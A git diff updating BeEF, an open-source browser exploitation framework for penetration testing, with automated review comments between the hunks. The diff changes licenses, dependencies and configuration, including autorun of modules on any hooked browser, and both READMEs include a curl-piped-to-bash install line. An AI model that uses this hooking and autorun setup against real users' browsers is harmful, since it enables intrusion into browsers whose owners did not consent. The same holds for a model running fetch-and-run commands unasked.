diff --git a/.gitignore b/.gitignore
index c02e0a406..7dacad784 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,8 @@
 beef.db
 test/msf-test
-custom-config.yaml
\ No newline at end of file
+custom-config.yaml
+.DS_Store
+.gitignore
+.rvmrc
+
+*.lock
diff --git a/BeEFLive.sh b/BeEFLive.sh
new file mode 100644
index 000000000..10b06769e
--- /dev/null
+++ b/BeEFLive.sh
@@ -0,0 +1,2 @@
+# Reference for old (<1.2) versions of BeEF Live
+bash /opt/beef/liveCD/BeEFLive.sh
diff --git a/Gemfile b/Gemfile
index 155418d9b..f3dcf01d0 100644
--- a/Gemfile
+++ b/Gemfile
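Review bot: `*.lock` at the end of the hunk keeps Gemfile.lock out of the repository, so the exact pins the Gemfile hunk adds (eventmachine 1.0.3, sinatra 1.4.2, rack 1.5.2) cover a handful of gems while every other gem and all transitive dependencies resolve to whatever is newest at install time. For an application checkout, a committed Gemfile.lock is what makes `bundle install` reproducible and lets a reviewer see exactly which versions ship; dropping the `*.lock` line, or narrowing it to the lock file actually meant, is the fix. The `.gitignore` entry two lines above ignores the ignore file itself; it is a no-op for an already-tracked file and looks unintended.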
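Review bot: The new script has no interpreter line, so what runs it when executed directly depends on the caller's shell; add `#!/usr/bin/env bash` as the first line, and note the header records `new file mode 100644`, so the file is not executable either. The wrapper hard-codes `/opt/beef/liveCD/BeEFLive.sh` and the existing comment only says it is for pre-1.2 BeEF Live; a comment such as `# Path of the pre-1.2 LiveCD install; adjust if BeEF lives elsewhere` would tell the next reader why that path is assumed.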
@@ -1,33 +1,26 @@
 # BeEF's Gemfile
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # Gems only required on Windows, or with specific Windows issues
 if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
 gem "win32console"
- gem "eventmachine", "1.0.0.beta.4.1"
-else
- gem "eventmachine", "0.12.10"
 end
+gem "eventmachine", "1.0.3"
 gem "thin"
-gem "sinatra", "1.3.2"
+gem "sinatra", "1.4.2"
+gem "rack", "1.5.2"
 gem "em-websocket", "~> 0.3.6"
-gem "jsmin", "~> 1.0.1"
+gem "uglifier", "~> 2.2.1"
+# install https://github.com/cowboyd/therubyracer if the OS is != than OSX
+if !RUBY_PLATFORM.downcase.include?("darwin")
+ gem "therubyracer", "~> 0.12.0"
+end
 gem "ansi"
 gem "term-ansicolor", :require => "term/ansicolor"
 gem "dm-core"
@@ -38,6 +31,7 @@ gem "parseconfig"
 gem "erubis"
 gem "dm-migrations"
 gem "msfrpc-client"
+gem "rubyzip", "~> 1.0.0"
 # notifications
 gem "twitter"
diff --git a/INSTALL.txt b/INSTALL.txt
index fcf9719c5..421d766c2 100644
--- a/INSTALL.txt
+++ b/INSTALL.txt
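Review bot: `gem "rubyzip", "~> 1.0.0"` in the second hunk brings in an archive library, and rubyzip releases of that vintage write each entry to the path given in the archive header as-is (verify against the pinned release); wherever the framework extracts archives it did not build itself, the resolved path of every entry must be checked to stay under the destination directory before writing. The `require 'zip'` added in core/core.rb is only the load point, and the extraction call site is outside this diff, so that check cannot be confirmed here. The `~> 1.0.0` constraint also excludes later 1.x releases and their fixes; `~> 1.0` keeps the major but allows them. In the first hunk, `if !RUBY_PLATFORM.downcase.include?("darwin")` reads more naturally as `unless RUBY_PLATFORM.downcase.include?("darwin")`.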
@@ -1,18 +1,8 @@ =============================================================================== - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. + Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission =============================================================================== diff --git a/README b/README index cdca66e3c..c584cbd55 100644 --- a/README +++ b/README 
@@ -1,84 +1,74 @@ -=============================================================================== - - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - -=============================================================================== - -What is BeEF? -------------- - -BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. - -Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. - - -Get Involved ------------- - -You can get in touch with the BeEF team. Just check out the following: - - -Please, send us pull requests! 
- -Web: http://beefproject.com/ - -Mail: beef-subscribe@bindshell.net - -IRC: ircs://irc.freenode.net/beefproject - -Twitter: @beefproject - - -Requirements ------------- - -* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher -* [Ruby](http://rubylang.org) 1.9.2 RVM or higher -* [SQLite](http://sqlite.org) 3.x -* The following GEMS: - - bundler - - thin - - Sinatra - - ANSI - - TERM-ANSIcolor - - dm-core - - json - - data_objects - - dm-sqlite-adapter - - parseconfig - - erubis - - dm-migrations - - msfrpc-client - - eventmachine - - win32console (Windows Only) - - -Quick Start ------------ - -__The following is for the impatient.__ - -For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. - - $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) - - -Usage ------ - -To get started, simply execute beef and follow the instrustions: - - $ ./beef - +=============================================================================== + + Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + +=============================================================================== + +What is BeEF? +------------- + +BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. + +Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. 
BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. + + +Get Involved +------------ + +You can get in touch with the BeEF team. Just check out the following: + + +Please, send us pull requests! + +Web: http://beefproject.com/ + +Mail: beef-subscribe@bindshell.net + +IRC: ircs://irc.freenode.net/beefproject + +Twitter: @beefproject + + +Requirements +------------ + +* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher +* [Ruby](http://rubylang.org) 1.9.2 RVM or higher +* [SQLite](http://sqlite.org) 3.x +* The following GEMS: + - bundler + - thin + - Sinatra + - ANSI + - TERM-ANSIcolor + - dm-core + - json + - data_objects + - dm-sqlite-adapter + - parseconfig + - erubis + - dm-migrations + - msfrpc-client + - eventmachine + - win32console (Windows Only) + + +Quick Start +----------- + +__The following is for the impatient.__ + +For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. + + $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) + + +Usage +----- + +To get started, simply execute beef and follow the instrustions: + + $ ./beef + diff --git a/README.mkd b/README.mkd index 272b5ae76..d1feda102 100644 --- a/README.mkd +++ b/README.mkd 
@@ -1,84 +1,77 @@ -=============================================================================== - - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - -=============================================================================== - -What is BeEF? -------------- - -__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser. - -Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. - - -Get Involved ------------- - -You can get in touch with the BeEF team. 
Just check out the following: - - -__Please, send us pull requests!__ - -__Web:__ http://beefproject.com/ - -__Mail:__ beef-subscribe@bindshell.net - -__IRC:__ ircs://irc.freenode.net/beefproject - -__Twitter:__ @beefproject - - -Requirements ------------- - -* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher -* [Ruby](http://rubylang.org) 1.9.2 RVM or higher -* [SQLite](http://sqlite.org) 3.x -* The following GEMS: - - bundler - - thin - - Sinatra - - ANSI - - TERM-ANSIcolor - - dm-core - - json - - data_objects - - dm-sqlite-adapter - - parseconfig - - erubis - - dm-migrations - - msfrpc-client - - eventmachine - - win32console (Windows Only) - - -Quick Start ------------ - -__The following is for the impatient.__ - -For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. - - $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable - - -Usage ------ - -To get started, simply execute beef and follow the instructions: - - $ ./beef - +=============================================================================== + + Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + +=============================================================================== + +What is BeEF? +------------- + +__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser. + +Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. 
BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. + + +Get Involved +------------ + +You can get in touch with the BeEF team. Just check out the following: + + +__Please, send us pull requests!__ + +__Web:__ http://beefproject.com/ + +__Mail:__ beef-subscribe@bindshell.net + +__IRC:__ ircs://irc.freenode.net/beefproject + +__Twitter:__ @beefproject + + +Requirements +------------ + +* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher +* [Ruby](http://rubylang.org) 1.9.2 RVM or higher +* [SQLite](http://sqlite.org) 3.x +* The following GEMS: + - bundler + - thin + - Sinatra + - ANSI + - TERM-ANSIcolor + - dm-core + - json + - data_objects + - dm-sqlite-adapter + - parseconfig + - erubis + - dm-migrations + - msfrpc-client + - eventmachine + - win32console (Windows Only) + + +Quick Start +----------- + +__The following is for the impatient.__ + +For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. + + $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable + + +Usage +----- + +To get started, simply execute beef and follow the instructions: + + $ ./beef + +On windows use + + $ ruby beef diff --git a/Rakefile b/Rakefile index adb1a8d14..e40188318 100644 --- a/Rakefile +++ b/Rakefile 
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 task :default => ["quick"]
@@ -86,10 +76,10 @@ end
 @beef_process_id = nil;
 task :beef_start => 'beef' do
- printf "Starting BeEF (wait 10 seconds)..."
+ printf "Starting BeEF (wait a few seconds)..."
 @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
- delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
- delays.each do |i| # delay for 10 seconds
+ delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+ delays.each do |i| # delay for a few seconds
 printf '.'
 sleep (i)
 end
diff --git a/VERSION b/VERSION
index ea837d9ad..683cbeb1e 100644
--- a/VERSION
+++ b/VERSION
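Review bot: The new `delays` array in the second hunk sums to 24 seconds while the printf it accompanies now says "wait a few seconds", and the wait is still blind: a server that is up after 3 seconds idles the task for 21 more, and one that is slower (first run, migrations) has the tests start against nothing. Polling the listener until it accepts a connection, with a deadline, removes the guess; config.yaml's `http.port` default on this page is 3000, and the loop below needs `require 'socket'` at the top of the Rakefile. The `2> /dev/null` on the popen line also discards the output that would explain a failed start. The `beef_start` task body continues past the hunk.
```ruby
task :beef_start => 'beef' do
  printf "Starting BeEF..."
  @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
  # wait until the HTTP listener accepts connections instead of sleeping a fixed 24 s
  deadline = Time.now + 30
  begin
    TCPSocket.new('127.0.0.1', 3000).close
  rescue Errno::ECONNREFUSED
    raise "BeEF did not start within 30 seconds" if Time.now > deadline
    printf '.'
    sleep 1
    retry
  end
  # … unchanged: rest of the task …
```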
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
-0.4.3.7-alpha
+0.4.4.9-alpha
diff --git a/beef b/beef
index 2a9672d46..7ea4d70c8 100755
--- a/beef
+++ b/beef
@@ -1,19 +1,9 @@
 #!/usr/bin/env ruby
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # stop deprecation warning from being displayed
@@ -85,6 +75,7 @@ case config.get("beef.database.driver") DataMapper.setup(:default, :adapter => config.get("beef.database.driver"), :host => config.get("beef.database.db_host"), + :port => config.get("beef.database.db_port"), :username => config.get("beef.database.db_user"), :password => config.get("beef.database.db_passwd"), :database => config.get("beef.database.db_name"), diff --git a/config.yaml b/config.yaml index 46c5e98c0..970cfc3ac 100644 --- a/config.yaml +++ b/config.yaml 
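Review bot: `:port => config.get("beef.database.db_port")` is now passed for every non-sqlite driver, but the only default this commit ships (config.yaml, `db_port: 5432`) is PostgreSQL's, so a MySQL user who keeps the default connects to the wrong port, and a custom config written before this change has no `db_port` key at all, leaving DataMapper with whatever `config.get` returns for a missing key (presumably nil; confirm it is tolerated rather than raised). A comment on the new line would prevent the first mistake: `# db_port must match the driver: 5432 for postgres, 3306 for mysql`. The enclosing `case config.get("beef.database.driver")` starts outside the hunk.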
@@ -1,62 +1,64 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # BeEF Configuration file beef: - version: '0.4.3.7-alpha' + version: '0.4.4.9-alpha' debug: false restrictions: - # subnet of browser ip addresses that can hook to the framework + # subnet of browser ip addresses that can hook to the framework permitted_hooking_subnet: "0.0.0.0/0" - # subnet of browser ip addresses that can connect to the UI + # subnet of browser ip addresses that can connect to the UI # permitted_ui_subnet: "127.0.0.1/32" permitted_ui_subnet: "0.0.0.0/0" - + http: debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace. host: "0.0.0.0" port: "3000" + # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results. + # It's not advised to decrease it with tons of hooked browsers (more than 50), + # because it might impact performance. Also, enable WebSockets is generally better. 
+ xhr_poll_timeout: 5000 # if running behind a nat set the public ip address here #public: "" #public_port: "" # port setting is experimental - dns: "localhost" - panel_path: "/ui/panel" + # DNS + dns_host: "localhost" + dns_port: 53 + web_ui_basepath: "/ui" hook_file: "/hook.js" hook_session_name: "BEEFHOOK" session_cookie_name: "BEEFSESSION" + # Allow one or multiple domains to access the RESTful API using CORS + # For multiple domains use: "http://browserhacker.com, http://domain2.com" + restful_api: + allow_cors: false + cors_allowed_domains: "http://browserhacker.com" + # Prefer WebSockets over XHR-polling when possible. websocket: enable: false - secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF + secure: true # use 'WebSocketSecure' works only on HTTPS domains and with HTTPS support enabled in BeEF port: 61985 # WS: good success rate through proxies - secure_port: 61986 # WSS - alive_timer: 1000 # poll BeEF every second + secure_port: 61986 # WSSecure + ws_poll_timeout: 1000 # poll BeEF every second # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header) web_server_imitation: - enable: false + enable: true type: "apache" #supported: apache, iis # Experimental HTTPS support for the hook / admin / all other Thin managed web services https: enable: false # In production environments, be sure to use a valid certificate signed for the value - # used in beef.http.dns (the domain name of the server where you run BeEF) + # used in beef.http.dns_host (the domain name of the server where you run BeEF) key: "beef_key.pem" cert: "beef_cert.pem" 
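Review bot: `cors_allowed_domains: "http://browserhacker.com"` ships a live third-party origin as the default; with `allow_cors: false` it is inert, but an operator who flips that flag without editing the next line grants that origin cross-site access to the RESTful API. A neutral default, `cors_allowed_domains: ""` with the comment `# no origin is allowed until you set this`, is the safer shape, and the comment block should say that CORS only relaxes the browser's same-origin policy and does not replace the API's own authentication. The flip of `web_server_imitation.enable` to `true` in the same hunk changes externally visible default behaviour and deserves a mention in the commit message.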
@@ -65,13 +67,20 @@ beef: # README.databases file # supported DBs: sqlite, mysql, postgres + # NOTE: you must change the Gemfile adding a gem require line like: + # gem "dm-postgres-adapter" + # or + # gem "dm-mysql-adapter" + # if you want to switch drivers from sqlite to postgres (or mysql). + # Finally, run a 'bundle install' command and start BeEF. driver: "sqlite" # db_file is only used for sqlite db_file: "beef.db" - + # db connection information is only used for mysql/postgres db_host: "localhost" + db_port: 5432 db_name: "beef" db_user: "beef" db_passwd: "beef123" @@ -82,18 +91,33 @@ beef: user: "beef" passwd: "beef" + # Autorun modules as soon the browser is hooked. + # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically. + autorun: + enable: true + # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify + allow_user_notify: true + crypto_default_value_length: 80 + # Enable client-side debugging + client: + debug: false + # You may override default extension configuration parameters here extension: requester: - enable: true + enable: true proxy: - enable: true + enable: true metasploit: enable: false - console: - shell: - enable: false + social_engineering: + enable: true evasion: enable: false + console: + shell: + enable: false + ipec: + enable: true diff --git a/core/api.rb b/core/api.rb index 0d845d02d..880e326e5 100644 --- a/core/api.rb +++ b/core/api.rb 
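Review bot: `db_port: 5432` in the second hunk is the PostgreSQL default, yet the comment block added just above presents `dm-mysql-adapter` as an equal alternative whose server listens on 3306 by default; the value should be documented as driver-specific, `db_port: 5432 # postgres default; use 3306 for mysql`. In the third hunk `autorun: enable: true` makes module execution on every newly hooked browser the shipped default, and the first hunk leaves `permitted_hooking_subnet` at `0.0.0.0/0`, so a comment next to `enable:` stating that autorun fires for any browser that loads the hook, not only those the operator selected, would let an operator decide deliberately rather than discover it.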
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/api/extension.rb b/core/api/extension.rb index 1358e32d2..bc2a6594f 100644 --- a/core/api/extension.rb +++ b/core/api/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/api/extensions.rb b/core/api/extensions.rb index 5d5be8cb2..bb530bd41 100644 --- a/core/api/extensions.rb +++ b/core/api/extensions.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/configuration.rb b/core/api/main/configuration.rb index d047068a3..ef6d7966a 100644 --- a/core/api/main/configuration.rb +++ b/core/api/main/configuration.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/migration.rb b/core/api/main/migration.rb index 947503c41..ec7d6eb4a 100644 --- a/core/api/main/migration.rb 
+++ b/core/api/main/migration.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/network_stack/assethandler.rb b/core/api/main/network_stack/assethandler.rb index d2dffe0dd..9bcb5df48 100644 --- a/core/api/main/network_stack/assethandler.rb +++ b/core/api/main/network_stack/assethandler.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API 
diff --git a/core/api/main/server.rb b/core/api/main/server.rb index 026a1ac5c..78df7c5bd 100644 --- a/core/api/main/server.rb +++ b/core/api/main/server.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/server/hook.rb b/core/api/main/server/hook.rb index cb34f5244..d00633f2c 100644 --- a/core/api/main/server/hook.rb +++ b/core/api/main/server/hook.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API 
diff --git a/core/api/module.rb b/core/api/module.rb index 5bbfc344d..5b0ba140a 100644 --- a/core/api/module.rb +++ b/core/api/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/modules.rb b/core/api/modules.rb index 1ee8b1a38..712037e90 100644 --- a/core/api/modules.rb +++ b/core/api/modules.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API 
